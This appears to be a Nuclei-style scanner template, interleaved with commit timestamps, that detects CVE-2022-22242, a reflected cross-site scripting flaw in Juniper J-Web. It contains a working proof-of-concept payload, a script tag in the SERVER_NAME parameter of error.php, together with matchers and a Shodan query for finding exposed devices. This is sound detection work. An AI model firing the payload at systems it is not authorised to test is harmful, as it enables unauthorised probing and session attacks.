2022-11-01 23:45:53 +00:00
id : CVE-2022-22242
2022-10-28 14:58:55 +00:00
info :
2022-10-28 15:37:02 +00:00
name : Juniper Web Device Manager - Cross-Site Scripting
2022-10-28 14:58:55 +00:00
author : EvergreenCartoons
2022-11-03 04:03:25 +00:00
severity : medium
description : |
A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim's browser in the context of their session within J-Web
2022-10-28 14:58:55 +00:00
reference :
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
2022-11-03 04:03:25 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-22242
- https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US
2022-11-03 04:22:16 +00:00
- https://kb.juniper.net/JSA69899
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-22242
cwe-id : CWE-79
2022-10-28 15:37:47 +00:00
metadata :
shodan-query : title:"Juniper Web Device Manager"
2022-11-03 04:22:16 +00:00
verified : "true"
2022-11-03 04:03:25 +00:00
tags : cve,cve2022,xss,juniper,junos
2022-10-28 14:58:55 +00:00
requests :
- method : GET
path :
2022-10-28 15:37:02 +00:00
- '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>'
2022-10-28 14:58:55 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2022-10-28 15:37:02 +00:00
words :
- "<script>alert(document.domain)</script>"
- "The requested resource is not authorized to view"
condition : and
2022-10-28 14:58:55 +00:00
- type : word
2022-10-28 15:39:06 +00:00
part : header
2022-10-28 14:58:55 +00:00
words :
- "text/html"
2022-10-28 15:37:02 +00:00
- type : status
status :
- 200
